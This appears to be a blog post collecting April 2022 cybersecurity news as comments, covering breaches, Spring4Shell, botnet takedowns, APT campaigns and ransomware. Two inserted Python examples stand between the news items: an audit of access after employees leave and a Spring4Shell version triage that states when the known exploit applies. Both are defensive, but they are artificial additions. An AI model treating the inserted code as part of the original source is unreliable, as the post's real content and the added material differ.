Cyber security news April 2022

This posting is here to collect cyber security news in April 2022.

I post links to security vulnerability news in the comments of this article.

You are also free to post related links to comments.

425 Comments

  1. Tomi Engdahl says:

    CashApp Says Ex-Employee Stole Customer Stock Trading Data
    https://www.securityweek.com/cashapp-says-ex-employee-stole-customer-stock-trading-data

    Financial services and stock trading platform CashApp on Tuesday fessed up to a data breach being blamed on a former employee who stole brokerage data, including portfolio values, from an unknown number of U.S. accounts.

    CashApp, a subsidiary of Jack Dorsey’s Block (formerly Square), said the stolen data includes brokerage account numbers, full names, brokerage portfolio values, and brokerage portfolio holdings for one trading day.

    “Our security team recently determined that a former employee downloaded certain Cash App Investing reports that contained some customer information. While this employee had regular access to these reports as part of their past job responsibilities, in this instance these reports were accessed without permission after their employment ended,” the company said.

    CashApp did not say why an ex-employee maintained access to sensitive financial data after leaving the company. The company was also mum on the number of customers affected but noted in an SEC filing that it was contacting about 8.2 million current and former customers to warn about the breach.

    Reply
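The incident above turns on a leaver whose report access outlived their employment. The following is an added example, not CashApp's or Block's tooling: it reconciles an HR termination feed against a report-access log and flags any download after the owner's termination date, and separately lists accounts that are still enabled for terminated staff. The users, timestamps and report names are constructed for illustration.

```python
"""Post-termination access check (added example; hypothetical data)."""
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Dict, Iterable, List, Optional

# Constructed HR feed: user -> termination timestamp (None = still employed)
TERMINATIONS: Dict[str, Optional[datetime]] = {
    "alice": None,
    "bob": datetime(2022, 3, 1, 17, 0, tzinfo=timezone.utc),
    "carol": datetime(2022, 2, 15, 12, 0, tzinfo=timezone.utc),
}

# Constructed report-access log: "<ISO time> <user> <action> <object>"
ACCESS_LOG = """\
2022-02-28T09:12:03Z bob download investing-report-2022-02-27.csv
2022-03-02T22:41:18Z bob download investing-report-2022-03-01.csv
2022-03-03T08:05:44Z alice download investing-report-2022-03-02.csv
2022-03-04T01:17:09Z carol download investing-report-2022-03-03.csv
2022-03-04T01:18:30Z carol view dashboard
"""


@dataclass(frozen=True)
class Finding:
    user: str
    when: datetime
    action: str
    obj: str
    terminated_at: datetime


def parse_line(line: str):
    """Split one log line into (timestamp, user, action, object)."""
    ts, user, action, obj = line.split(" ", 3)
    when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return when, user, action, obj


def post_termination_access(log: str, terminations: Dict[str, Optional[datetime]]) -> List[Finding]:
    """Every access by a terminated user that happened after their termination time."""
    findings: List[Finding] = []
    for raw in log.splitlines():
        if not raw.strip():
            continue
        when, user, action, obj = parse_line(raw)
        term = terminations.get(user)
        if term is not None and when > term:
            findings.append(Finding(user, when, action, obj, term))
    return findings


def accounts_still_enabled(active_accounts: Iterable[str],
                           terminations: Dict[str, Optional[datetime]]) -> List[str]:
    """Accounts present in the report system whose owner HR lists as terminated."""
    return sorted(u for u in active_accounts if terminations.get(u) is not None)


if __name__ == "__main__":
    for f in post_termination_access(ACCESS_LOG, TERMINATIONS):
        delay = f.when - f.terminated_at
        print(f"{f.user}: {f.action} {f.obj} at {f.when:%Y-%m-%d %H:%M}Z, "
              f"{delay.days} day(s) after termination")
    print("still enabled:", accounts_still_enabled({"alice", "bob", "dave"}, TERMINATIONS))
```

Run daily against the real HR feed and the report system's audit log; the second check catches the root cause (an account that should have been disabled) even on days when no access happened.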
  2. Tomi Engdahl says:

    Ransomware Gang Leaks Files Stolen From Industrial Giant Parker Hannifin
    https://www.securityweek.com/ransomware-gang-leaks-files-stolen-industrial-giant-parker-hannifin

    A notorious cybercrime group has leaked several gigabytes of files allegedly stolen from US industrial components giant Parker Hannifin.

    Parker Hannifin specializes in motion and control technologies, and it provides precision engineered solutions for organizations in the aerospace, mobile, and industrial sectors.

    In a Tuesday regulatory filing, the Fortune 250 company said it detected a breach of its systems on March 14.

    Upon discovering the intrusion, Parker shut down some systems and launched an investigation. Law enforcement has been notified and cybersecurity and legal experts have been called in to assist.

    https://www.sec.gov/ix?doc=/Archives/edgar/data/0000076334/000007633422000009/ph-20220314.htm

    Reply
  3. Tomi Engdahl says:

    Millions of Installations Potentially Vulnerable to Spring Framework Flaw
    Internet scan indicates hundreds of thousands of vulnerable installations, while data from the major Java repository suggests millions, firms say.
    https://www.darkreading.com/application-security/vulnerable-spring-framework-instances-estimated-at-possibly-millions?iiris-ref=recommend

    Security firms produced two data points on Monday to estimate the number of Spring Framework installations that are vulnerable to the most recent flaw — CVE-2022-22965, also known as Spring4Shell or SpringShell — suggesting anywhere from hundreds of thousands to millions of instances are affected.

    Details of the vulnerability were leaked last week less than 24 hours after the issue was disclosed to the Spring project, leaving security professionals and developers scrambling. Scans for the specific combination of factors that suggest a vulnerable instance found 150,000 vulnerable devices after scanning a quarter of the Internet, suggesting that as many as 600,000 devices may have the vulnerable component that could be exploited by the leaked code, says Jared Smith, senior director of threat intelligence at security metrics firm SecurityScorecard.

    In addition, SecurityScorecard’s honeypot servers have detected active attempts to exploit the issues, he says.

    “Given early reports suggest [SpringShell affected] around 6,000 devices, this new number is much worse,” Smith says. “Log4j was much harder to assess whether an exposed port was using a Java-based application with Log4j behind the scenes. This is much more visible and directly available to exploit and test.”

    Reply
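The scans above count hosts matching the preconditions for CVE-2022-22965. The following is an added example, not SecurityScorecard's scanner or the Spring project's code, for triaging your own deployments from the inside: it pulls Spring Framework versions out of jar file names (as a `find / -name 'spring-*.jar'` listing would give them), applies the fixed-version boundaries from the Spring advisory (5.3.18 and 5.2.20; older unsupported lines also affected), and reports whether the published exploit's preconditions (JDK 9 or later, WAR deployed on Tomcat) are met. The jar paths are constructed.

```python
"""CVE-2022-22965 (Spring4Shell) triage from jar file names (added example)."""
import re
from typing import Iterable, List, Tuple

# First fixed patch level per supported branch, per the Spring advisory
FIXED = {(5, 3): 18, (5, 2): 20}


def parse_version(v: str) -> Tuple[int, int, int]:
    m = re.match(r"^(\d+)\.(\d+)\.(\d+)", v)
    if not m:
        raise ValueError(f"unparseable version: {v}")
    major, minor, patch = (int(x) for x in m.groups())
    return major, minor, patch


def spring_version_vulnerable(v: str) -> bool:
    """True if this Spring Framework version carries the bug."""
    major, minor, patch = parse_version(v)
    if (major, minor) in FIXED:
        return patch < FIXED[(major, minor)]
    # 5.4+ / 6.x never shipped the bug; anything below 5.2 is unsupported and affected
    return (major, minor) < (5, 2)


def spring4shell_exposure(spring_version: str, jdk_major: int, packaging: str) -> str:
    """'exploitable' if the known exploit's preconditions hold, 'patch-needed' if the
    bug is present but the known exploit does not apply, else 'not-affected'."""
    if not spring_version_vulnerable(spring_version):
        return "not-affected"
    if jdk_major >= 9 and packaging.lower() == "war":
        return "exploitable"
    return "patch-needed"


JAR_RE = re.compile(r"spring-(?:beans|core|webmvc|context)-(\d+\.\d+\.\d+)[^/]*\.jar$")


def find_spring_versions(paths: Iterable[str]) -> List[Tuple[str, str]]:
    """(path, version) for every Spring Framework jar in a file listing."""
    out = []
    for p in paths:
        m = JAR_RE.search(p)
        if m:
            out.append((p, m.group(1)))
    return out


def triage(paths: Iterable[str], jdk_major: int) -> List[Tuple[str, str, str]]:
    """(path, version, verdict); WEB-INF/lib means a WAR, BOOT-INF/lib an executable jar."""
    results = []
    for p, v in find_spring_versions(paths):
        packaging = "war" if "/WEB-INF/" in p else "jar"
        results.append((p, v, spring4shell_exposure(v, jdk_major, packaging)))
    return results


# Constructed listing, as a find over two deployments might produce it
SAMPLE_PATHS = [
    "/opt/tomcat/webapps/app/WEB-INF/lib/spring-beans-5.3.17.jar",
    "/opt/tomcat/webapps/app/WEB-INF/lib/spring-webmvc-5.3.17.jar",
    "/srv/api/BOOT-INF/lib/spring-beans-5.3.18.jar",
    "/srv/api/BOOT-INF/lib/jackson-databind-2.13.2.jar",
]

if __name__ == "__main__":
    for p, v, verdict in triage(SAMPLE_PATHS, jdk_major=11):
        print(f"{verdict:13} {v:8} {p}")
```

The verdict "patch-needed" is deliberate: the advisory recommends upgrading every affected version, and a JDK 8 host or an executable-jar deployment only escapes the exploit that leaked, not the bug.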
  4. Tomi Engdahl says:

    Springshell Exploit Resource Center
    https://www.sonatype.com/resources/springshell-exploit-resource-center

    Find a range of resources below to describe and resolve the critical software vulnerabilities in the Spring Framework, dubbed Springshell and Spring4Shell, affecting millions of users.

    Reply
  5. Tomi Engdahl says:

    Police seized log data from F-Secure's VPN service – Supreme Court ruled it unlawful
    https://www.is.fi/digitoday/tietoturva/art-2000008732480.html

    The Supreme Court's decision equates VPN users' log data with identification data, which the police cannot seize.

    The Supreme Court has ruled that a seizure carried out by the National Bureau of Investigation (NBI, KRP) was an unlawful means of revealing the identity of a person who had used a VPN-protected internet connection.

    In January 2019 the NBI received an urgent request for legal assistance from the German authorities relating to suspected aggravated sexual abuse of a child. The NBI interpreted the Coercive Measures Act as giving it the right to seize from the VPN provider log files that reveal the user's real, identifying IP address.

    According to confirmation obtained by Ilta-Sanomat Digitoday, the company in question is the Finnish security company F-Secure Oyj, which offers VPN services under the Freedome brand.

    In 2019 Helsinki District Court ruled that the seizure must be overturned and the data destroyed. The NBI appealed, and in 2020 Helsinki Court of Appeal upheld the district court's decision. The police appealed that decision as well.

    In its decision the Supreme Court stated that F-Secure must be regarded as a communications intermediary. In the eyes of the law it is therefore a telecommunications company comparable to a telecom operator, and the police may not seize or copy data from it by way of seizure. VPN service log data falls within the scope of privacy protection and constitutes identification data within the meaning of the Coercive Measures Act, not mere customer data.

    The Supreme Court's decision does not prevent the investigation of crimes committed behind a VPN connection. It does, however, force the police to follow the same procedure as for telecommunications interception, which requires a judge's decision.

    Reply
  6. Tomi Engdahl says:

    Story on the BBC news app today.

    BBC News – Isle of Wight: Council’s electric vehicle chargers hacked to show porn site
    https://www.bbc.com/news/uk-england-hampshire-61006816

    Electric vehicle charging points in a council’s car parks have been hacked to show a porn website on their screens.

    Isle of Wight Council has three charge points in Quay Road, Ryde, Cross Street, Cowes and Moa Place, Freshwater.

    In a statement the council apologised “to anyone that may have found the inappropriate web content”.

    The authority said staff were due to visit the charge points “to ensure the third party web address is covered up”.

    It is understood the chargers were meant to display the network’s own website, but the web address had been redirected and was instead taking visitors to a pornographic site.

    The council said: “We are saddened to learn that a third-party web address displayed on our electric vehicle (EV) signage appears to have been hacked.”

    Reply
  7. Tomi Engdahl says:

    A grim forecast from Mikko Hyppönen and Jarmo Limnéll: “Russia is irritated by the unity of Western countries”
    https://www.is.fi/digitoday/tietoturva/art-2000008733465.html
    Security experts predict that Russia's cyber war will expand from Ukraine to a global one.

    Reply
  8. Tomi Engdahl says:

    Police seized log data from F-Secure's VPN service – Supreme Court ruled the NBI's action unlawful https://www.is.fi/digitoday/tietoturva/art-2000008732480.html
    THE SUPREME COURT has ruled that a seizure carried out by the National Bureau of Investigation (NBI, KRP) was an unlawful means of revealing the identity of a person who had used a VPN-protected internet connection. In January 2019 the NBI received an urgent request for legal assistance from the German authorities relating to suspected aggravated sexual abuse of a child. The NBI interpreted the Coercive Measures Act as giving it the right to seize from the VPN provider log files that reveal the user's real, identifying IP address. In its decision the Supreme Court stated that F-Secure must be regarded as a communications intermediary.
    In the eyes of the law it is therefore a telecommunications company comparable to a telecom operator, and the police may not seize or copy data from it by way of seizure.
    VPN service log data falls within the scope of privacy protection and constitutes identification data within the meaning of the Coercive Measures Act, not mere customer data. The Supreme Court's decision does not prevent the investigation of crimes committed behind a VPN connection. It does, however, force the police to follow the same procedure as for telecommunications interception, which requires a judge's decision.

    Reply
  9. Tomi Engdahl says:

    Chinese hackers turned the hugely popular VLC media player into a tool https://www.kauppalehti.fi/uutiset/kiinalaiset-hakkerit-ottivat-supersuositun-mediasoittimen-tyokalukseen/319e28fa-707d-4423-b3a4-fdf5d5442a0c
    Security researchers have detected a long-running espionage operation run by hackers working for the Chinese state. The hackers have used the highly popular VLC Media Player application as an aid. According to Bleeping Computer, the operation has spied on governmental, legal and religious organizations as well as NGOs in North America, Asia and Europe. The espionage operation has been carried out by a hacking group known as Cicada. During its more than 15-year history the group has also gone by the names menuPass, Stone Panda, Potassium,
    APT10 and Red Apollo. Original:
    https://www.bleepingcomputer.com/news/security/chinese-hackers-abuse-vlc-media-player-to-launch-malware-loader/

    Reply
  10. Tomi Engdahl says:

    Beware Ukraine-themed fundraising scams
    https://blog.malwarebytes.com/scams/2022/04/beware-ukraine-themed-fundraising-scams/
    Unfortunately scammers continue to focus on the invasion of Ukraine to make money. A flurry of bogus domains and scam techniques are spreading their wings. They appear to focus on donation fakeouts but there’s a few other nasty surprises lying in wait too.

    Reply
  11. Tomi Engdahl says:

    Colibri Loader combines Task Scheduler and PowerShell in clever persistence technique https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/
    Colibri Loader is a relatively new piece of malware that first appeared on underground forums in August 2021 and was advertised to “people who have large volumes of traffic and lack of time to work out the material”. As it names suggests, it is meant to deliver and manage payloads onto infected computers. Our Threat Intelligence Team recently uncovered a new Colibri Loader campaign delivering the Vidar Stealer as final payload. There is already published material about Colibri by CloudSek and independent researchers. Since most of the details about the bot have been covered, we decided to highlight a persistence technique we haven’t seen before.

    Reply
  12. Tomi Engdahl says:

    Fake eshops on the prowl for banking credentials using Android malware https://www.welivesecurity.com/2022/04/06/fake-eshops-prowl-banking-credentials-android-malware/
    Seeking the opportunity to make a profit off this behavior, cybercriminals exploit it by tricking eager shoppers into downloading malicious applications. In an ongoing campaign targeting the customers of eight Malaysian banks, threat actors are trying to steal banking credentials by using fake websites that pose as legitimate services, sometimes outright copying the original. These websites use similar domain names to the services they are impersonating the better to attract unsuspecting victims. This campaign was first identified at the end of 2021, with the attackers impersonating the legitimate cleaning service Maid4u. Distributed through Facebook ads, the campaign tempts potential victims to download Android malware from a malicious website. It is still ongoing as of the publication of this blogpost, with even more distribution domains registered after its discovery. In January 2022, MalwareHunterTeam shared three more malicious websites and Android trojans attributed to this campaign.

    Reply
  13. Tomi Engdahl says:

    US disrupts prolific botnet controlled by Russian military, DOJ says https://therecord.media/us-disrupts-prolific-botnet-controlled-by-russian-military-doj-says/
    US Attorney General Merrick Garland announced Wednesday that US officials have disrupted a global botnet of thousands of infected devices allegedly controlled by the Russian military. Garland said the court-authorized operation was directed at Sandworm, a cyber-unit of the GRU Russian military intelligence service, and Cyclops Blink, an advanced modular botnet linked to the group. In a statement, the Justice Department said the operation “copied and removed malware from vulnerable internet-connected firewall devices that Sandworm used for command and control (C2) of the underlying botnet.” “Although the operation did not involve access to the Sandworm malware on the thousands of underlying victim devices worldwide, referred to as ‘bots,’ the disabling of the C2 mechanism severed those bots from the Sandworm C2 devices’ control,” the DOJ explained.

    Reply
  14. Tomi Engdahl says:

    Researcher finds cryptomining malware targeting AWS Lambda https://therecord.media/researcher-finds-cryptomining-malware-targeting-aws-lambda/
    Security researchers with Cado Labs said they have found what they believe is the first publicly-known case of malware specifically designed to execute in an AWS Lambda environment. AWS Lambda is a widely-used, serverless computing platform provided by Amazon as a part of Amazon Web Services. In a report released on Wednesday, Cado Labs researcher Matt Muir said they decided to name the malware “Denonia,” after the name the attackers gave the domain it communicates with.

    Reply
  15. Tomi Engdahl says:

    There have been extensive disruptions in the operation of safety phones in various parts of Finland; in Oulu around 100 elderly people's emergency wristbands are still not working https://yle.fi/uutiset/3-12392765?origin=rss
    The network disruptions have been going on since Tuesday evening, and when they began the problem was more widespread. Oulu's welfare services say that situations endangering life and health have been avoided.

    Reply
  16. Tomi Engdahl says:

    Online game robbed, haul 578,000,000 euros https://www.is.fi/digitoday/esports/art-2000008730781.html
    A THIEF or thieves took a crypto pot worth more than half a billion dollars through the back-end systems of the blockchain-based online game Axie Infinity, the Wall Street Journal and PC Gamer among others report.

    Reply
  17. Tomi Engdahl says:

    FBI Disables “Cyclops Blink” Botnet Controlled by Russian Intelligence Agency
    https://www.securityweek.com/fbi-disables-cyclops-blink-botnet-controlled-russian-intelligence-agency

    The U.S. government on Wednesday announced that it had neutralized a massive botnet of hardware devices controlled by Russia’s main intelligence agency (GRU).

    In the court-approved operation, the Federal Bureau of Investigation (FBI) partnered with Watchguard to copy and remove the “Cyclops Blink” malware that serves as the hub for a large-scale botnet targeting firewall appliances and SOHO networking devices.

    Cyclops Blink, which maintains persistence throughout the legitimate device firmware update process, has been directly linked to APT groups associated with the Russian government.

    In a statement Wednesday, the U.S. Justice Department said the operation was conducted last month “to disrupt a two-tiered global botnet of thousands of infected network hardware devices under the control of a threat actor known to security researchers as Sandworm.”

    Reply
  18. Tomi Engdahl says:

    Apple Leaves Big Sur, Catalina Exposed to Critical Flaws: Intego
    https://www.securityweek.com/intego-apple-leaves-big-sur-catalina-exposed-critical-flaws

    Apple is being called to task for neglecting to patch two “actively exploited” zero-day vulnerabilities on older versions of its flagship macOS platform.

    On March 31, Apple released emergency patches for the two memory corruption vulnerabilities — CVE-2022-22675 and CVE-2022-22674 — and said it was aware of a report that it was “actively exploited” in the wild.

    Those patches were only made available for iOS, iPadOS and macOS Monterey, meaning that Apple customers running Big Sur, Catalina or older versions of the operating system will remain exposed to hacker attacks targeting these security defects.

    “Apple has chosen to leave an estimated 35-40% of all supported Macs in danger of actively exploited vulnerabilities,” says Joshua Long, chief security analyst at Intego, a company that sells macOS security tools.

    Reply
  19. Tomi Engdahl says:

    Denonia: First Malware Targeting AWS Lambda
    https://www.securityweek.com/denonia-first-malware-targeting-aws-lambda

    Researchers have come across what appears to be the first piece of malware designed to specifically target AWS Lambda environments.

    The malware, named Denonia based on the name of a domain it communicates with, was discovered by researchers at Cado Security, who found samples uploaded to VirusTotal in January and late February. The samples are currently detected by roughly half of the security vendors on VirusTotal.

    Denonia was developed in Go and it currently appears to be used for cryptocurrency mining, specifically Monero (XMR), using a custom version of the popular XMRig mining software.

    AWS describes Lambda as a “serverless, event-driven compute service that lets you run code for virtually any type of application or backend service without provisioning or managing servers.”

    Cado noted that AWS secures the underlying Lambda execution environment, but it’s up to customers to secure functions, which makes it possible for cybercriminals to deploy such malware.

    An analysis of Denonia showed that the malware is designed to execute in Lambda environments, but it’s still unclear how it’s deployed.

    https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/

    Reply
  20. Tomi Engdahl says:

    Hamas-Linked Hackers Using Sexy ‘Catfish’ Lures, New Malware
    https://www.securityweek.com/hamas-linked-hackers-using-sexy-facebook-catfish-lures-new-malware

    Hamas-linked APT group targeting high-ranking Israelis with new malware

    APT-C-23, a Hamas-linked attack group, is said to be involved in a sophisticated catfishing campaign targeting high ranking Israeli officials. Beyond elaborate Facebook-focused social engineering, the group has introduced new malware including a fake messaging app (known as VolatileVenom), a downloader (known as Barbie Downloader) and a backdoor (BarbWire Backdoor).

    The campaign individually targets high profile officials working in defense, law enforcement, emergency services, and other government-related organizations. The attack involves social engineering, a downloader, a backdoor and a separate Android malware. The purpose appears to be espionage. The campaign was discovered and analyzed by Cybereason’s Nocturnus researcher team.

    Reply
  21. Tomi Engdahl says:

    Ingrid Lunden / TechCrunch:
    Nord Security, the Lithuania-based startup behind NordVPN, raises $100M, its first ever funding, at a $1.6B valuation led by Novator Ventures — VPN usage has surged in the last several years, with growing concerns over data privacy and security — and sometimes completely different motivations …

    NordVPN raises its first money, $100M at a $1.6B valuation
    https://techcrunch.com/2022/04/06/nord-security-the-startup-behind-nordvpn-raises-its-first-ever-funding-100m-at-a-1-6b-valuation/

    Reply
  22. Tomi Engdahl says:

    Zack Whittaker / TechCrunch:
    In a court-authorized March operation, the FBI cut off the servers of the Cyclops Blink botnet, tied to Russia’s Sandworm, from Asus and WatchGuard routers — The Federal Bureau of Investigation has disclosed it carried out an operation in March to target a massive botnet controlled by Russian intelligence.

    FBI operation aims to take down massive Russian GRU botnet
    https://techcrunch.com/2022/04/06/fbi-operation-botnet-sandworm/

    The Federal Bureau of Investigation has disclosed it carried out an operation in March to target a massive botnet controlled by Russian intelligence.

    The operation was authorized by courts in California and Pennsylvania, allowing the FBI to copy and remove the so-called Cyclops Blink malware from its command and control servers, also known as C2s, allowing the FBI to sever the connections to thousands of compromised infected devices that were taking instructions from the servers.

    The Justice Department announced the March operation on Wednesday, describing it as “successful,” but warned that device owners should still review the initial February 23 advisory to secure their compromised devices and prevent reinfection.

    Reply
  23. Tomi Engdahl says:

    Audrey An / The Keyword:
    Google will roll out Privacy Guide, a guided tour of privacy and security settings in Chrome, to all desktop users on version 100 or above in the coming weeks — Product Manager, Chrome at Google Safety Engineering Center Munich — Your browser plays a big role in your online experience — including protecting your privacy.

    Take a step-by-step tour of your Chrome privacy settings
    https://blog.google/products/chrome/take-step-step-guide-your-chrome-privacy-settings/

    Reply
  24. Tomi Engdahl says:

    Matt Burgess / Wired:
    New data-sharing proposals in Europe push for the expansion of facial recognition and to allow police forces across the EU to link their photo databases — Lawmakers advance proposals to let police forces across the EU link their photo databases—which include millions of pictures of people’s faces.

    Europe Is Building a Huge International Facial Recognition System
    https://www.wired.com/story/europe-police-facial-recognition-prum/

    Lawmakers advance proposals to let police forces across the EU link their photo databases—which include millions of pictures of people’s faces.

    Reply
  25. Tomi Engdahl says:

    Nigerian social media accounts targeted in influence campaign centered on Ukraine invasion https://therecord.media/nigerian-social-media-accounts-targeted-in-influence-campaign-centered-on-ukraine-invasion/
    Owonikoko, a Nigerian web designer and development artist, appears to have been one of many bystanders in the Global South caught in the online battle to control how people perceive Russia’s invasion of Ukraine. In response to these content moderation challenges, social media companies have ramped up bot and misinformation monitoring and the global media is investigating the scope of the problem.

    Reply
  26. Tomi Engdahl says:

    Watch out for fake WhatsApp “New Incoming Voicemessage” emails https://blog.malwarebytes.com/social-engineering/2022/04/watch-out-for-fake-whatsapp-new-incoming-voicemessage-emails/
    The sender is “Whatsapp Notifier,” a spoofed name, and an email address using a legitimate domain belonging to a Russian road safety organization, to sneak through mail filters. Recipients are encouraged to click a “Play” button and listen to their voicemail. That doesn’t happen, though: clicking “Play” directs recipients to a page where Armorblox found an obfuscated, malicious JavaScript that redirected users to another page. The second page included an exploit, triggered when users responded to an Allow/Block prompt.

    Reply
  27. Tomi Engdahl says:

    Android apps with 45 million installs used data harvesting SDK https://www.bleepingcomputer.com/news/security/android-apps-with-45-million-installs-used-data-harvesting-sdk/
    The apps collected this data through a third-party SDK that includes the ability to capture clipboard content, GPS data, email addresses, phone numbers, and even the user’s modem router MAC address and network SSID. According to AppCensus, who discovered the use of this SDK, the collected data is bundled and transmitted by the SDK to the domain “mobile.measurelib.com,” which appears to be owned by a Panama-based analytics firm named Measurement Systems.

    Reply
  28. Tomi Engdahl says:

    Fake e-shops on the prowl for banking credentials using Android malware https://www.welivesecurity.com/2022/04/06/fake-eshops-prowl-banking-credentials-android-malware/
    Seeking the opportunity to make a profit off this behavior, cybercriminals exploit it by tricking eager shoppers into downloading malicious applications. In an ongoing campaign targeting the customers of eight Malaysian banks, threat actors are trying to steal banking credentials by using fake websites that pose as legitimate services, sometimes outright copying the original. These websites use similar domain names to the services they are impersonating the better to attract unsuspecting victims.

    Reply
  29. Tomi Engdahl says:

    Google is on guard: sharks shall not pass!
    https://research.checkpoint.com/2022/google-is-on-guard-sharks-shall-not-pass/
    This is what the Check Point Research (CPR) team encountered while analyzing suspicious applications found in Google Play. These applications pretended to be genuine AV solutions while in reality they downloaded and installed an Android stealer called Sharkbot. In this article, we provide a deep technical analysis of Sharkbot and reveal the steps that helped us to spot the malware-spreading applications on Google Play.

    Reply
  30. Tomi Engdahl says:

    WatchGuard failed to explicitly disclose critical flaw exploited by Russian hackers https://arstechnica.com/information-technology/2022/04/watchguard-failed-to-disclose-critical-flaw-exploited-by-russian-hackers/
    In court documents unsealed on Wednesday, an FBI agent wrote that the WatchGuard firewalls hacked by Sandworm were “vulnerable to an exploit that allows unauthorized remote access to the management panels of those devices.” It wasn’t until after the court document was public that WatchGuard published this FAQ, which for the first time made reference to CVE-2022-23176, a vulnerability with a severity rating of 8.8 out of a possible 10.

    Reply
  31. Tomi Engdahl says:

    State-sponsored Attack Groups Capitalise on Russia-Ukraine War for Cyber Espionage https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/
    The use of the conflict as a bait is not limited to a specific region or APT group; it goes from Latin America to the Middle East and to Asia. In this article, CPR will provide an overview of several campaigns by different APT groups using the ongoing Russia-Ukraine war to increase the efficiency of their campaigns. CPR will discuss the victimology of these campaigns and the tactics used, and provide technical analysis of the observed malicious payloads and malware, specially crafted for this cyber-espionage.

    Reply
  32. Tomi Engdahl says:

    Continued Targeting of Indian Power Grid Assets by Chinese State-Sponsored Activity Group https://www.recordedfuture.com/continued-targeting-of-indian-power-grid-assets/
    In recent months, we observed likely network intrusions targeting at least 7 Indian State Load Despatch Centres (SLDCs) responsible for carrying out real-time operations for grid control and electricity dispatch within these respective states. Notably, this targeting has been geographically concentrated, with the identified SLDCs located in North India, in proximity to the disputed India-China border in Ladakh. One of these SLDCs was also targeted in previous RedEcho activity. This latest set of intrusions, however, is composed of an almost entirely different set of victim organizations. In addition to the targeting of power grid assets, we also identified the compromise of a national emergency response system and the Indian subsidiary of a multinational logistics company by the same threat activity group. To achieve this, the group likely compromised and co-opted internet-facing DVR/IP camera devices for command and control (C2) of Shadowpad malware infections, as well as use of the open source tool FastReverseProxy (FRP).

    Reply
  33. Tomi Engdahl says:

    VMware Patches Five Critical Vulnerabilities in Workspace ONE Access
    https://www.securityweek.com/vmware-patches-five-critical-vulnerabilities-workspace-one-access

    VMware on Wednesday announced patches for several critical and high-severity vulnerabilities affecting Workspace ONE Access and other products.

    A total of eight security holes are detailed in the company’s advisory, affecting VMware Workspace ONE Access, Identity Manager (vIDM, the previous name of Workspace ONE Access), vRealize Automation (vRA), Cloud Foundation, and Suite Lifecycle Manager. Five of the issues are rated “critical severity.”

    With a CVSS score of 9.8 and tracked as CVE-2022-22954, the first of the bugs is a remote code execution vulnerability affecting both Workspace ONE Access and Identity Manager.

    The issue exists because a “malicious actor with network access can trigger a server-side template injection,” which could result in remote code execution.

    VMware also announced patches for two authentication bypass vulnerabilities in the OAuth2 ACS framework of Workspace ONE Access, which could allow a malicious actor to “execute any operation due to exposed endpoints in the authentication framework.”

    Tracked as CVE-2022-22955 and CVE-2022-22956, the issues have a CVSS score of 9.8.

    Reply
  34. Tomi Engdahl says:

    BlackCat Ransomware Targets Industrial Companies
    https://www.securityweek.com/blackcat-ransomware-targets-industrial-companies

    A data theft tool used by the ransomware group tracked as BlackCat, ALPHV and Noberus, suggests that the cybercriminals are increasingly interested in targeting industrial organizations.

    The BlackCat ransomware group, which operates under a ransomware-as-a-service (RaaS) model, emerged in November 2021 and has since targeted organizations worldwide, including many in the United States.

    Several cybersecurity firms have found links between BlackCat and the BlackMatter and DarkSide ransomware operations. It appears that the BlackCat team consists of various RaaS group affiliates, including BlackMatter, rather than being a rebranding of BlackMatter.

    In a blog post published on Thursday, Kaspersky also provided information on the connection between BlackMatter and BlackCat, focusing on a data exfiltration tool called Fendr (also known as ExMatter).

    Fendr was described by Symantec last year as a custom data exfiltration tool that enabled BlackMatter operators to easily steal data of value from compromised systems. The tool, previously seen only in BlackMatter attacks, is designed to collect specific file types and upload them to the cybercriminals’ servers before file-encrypting ransomware is deployed. The stolen data can then be used to pressure the victim into paying up.

    In a report published in February, industrial cybersecurity firm Claroty said ransomware often hits industrial control systems (ICS) or other operational technology (OT) environments, and impact is often significant.

    Ransomware Often Hits Industrial Systems, With Significant Impact: Survey
    https://www.securityweek.com/ransomware-often-hits-industrial-systems-significant-impact-survey

    Ransomware attacks in many cases hit industrial control systems (ICS) or operational technology (OT) environments, and impact is often significant, according to a report published on Thursday by IoT and industrial cybersecurity company Claroty.

    Claroty’s “Global State of Industrial Cybersecurity” report is based on a Pollfish survey of 1,100 IT and OT security professionals in the United States, Europe and the APAC region. More than half of respondents work for enterprises that have an annual revenue exceeding $1 billion. The survey was conducted in September 2021.

    Roughly 80% of respondents admitted that their organization had experienced a ransomware attack within the past year, and nearly half said the incident had impacted their ICS/OT environment.

    Only 15% of respondents said there was no impact or minimal impact on operations, and nearly 50% said there was significant impact. Seven percent said the incident resulted in a full operations shutdown that lasted for more than a week.

    The cyberattack was disclosed to both authorities and shareholders in most cases, but some companies apparently did not inform anyone.

    Reply
  35. Tomi Engdahl says:

    India Claims It Foiled Chinese Cyberattack on Disputed Border
    https://www.securityweek.com/india-claims-it-foiled-chinese-cyberattack-disputed-border

    India on Thursday claimed it foiled an attempted cyber-attack by Chinese hackers targeting its power distribution system near a disputed frontier where the two countries are engaged in a military stand-off.

    Ties between the world’s two most populous nations are at a low ebb after a deadly skirmish in the Himalayan region of Ladakh that left at least 20 Indian and four Chinese soldiers dead in 2020.

    “Two attempts by Chinese hackers were made to target electricity distribution centres near Ladakh but were not successful,” power minister R.K. Singh told reporters in New Delhi.

    Singh added that India had deployed “defence systems” to counter such attacks.

    New Delhi’s claim came a day after US-based intelligence firm Recorded Future said suspected Chinese hackers had made at least seven attempts to target Indian power infrastructure in recent months.

    The attacks targeted infrastructure “responsible for carrying out real-time operations for grid control and electricity dispatch”, the group reported.

    “This targeting has been geographically concentrated… in north India, in proximity to the disputed India-China border in Ladakh.”

    Reply
  36. Tomi Engdahl says:

    VPN Provider Nord Security Reaches Unicorn Status With $100 Million Funding
    https://www.securityweek.com/vpn-provider-nord-security-reaches-unicorn-status-100-million-funding

    Lithuania-based VPN provider reaches “Unicorn” status with first ever outside funding

    Lithuania-based Nord Security has raised $100 million in its first ever outside capital funding with a financing round led by Novator Ventures, and participation from Burda Principal Investments and General Catalyst. The funding values the company at $1.6 billion.

    Reply
  37. Tomi Engdahl says:

    Denial-of-service attack under way: Ministry of Defence website down
    The Ministry of Defence website cannot be reached. The Ministry for Foreign Affairs website also went down, but it has been restored to normal.
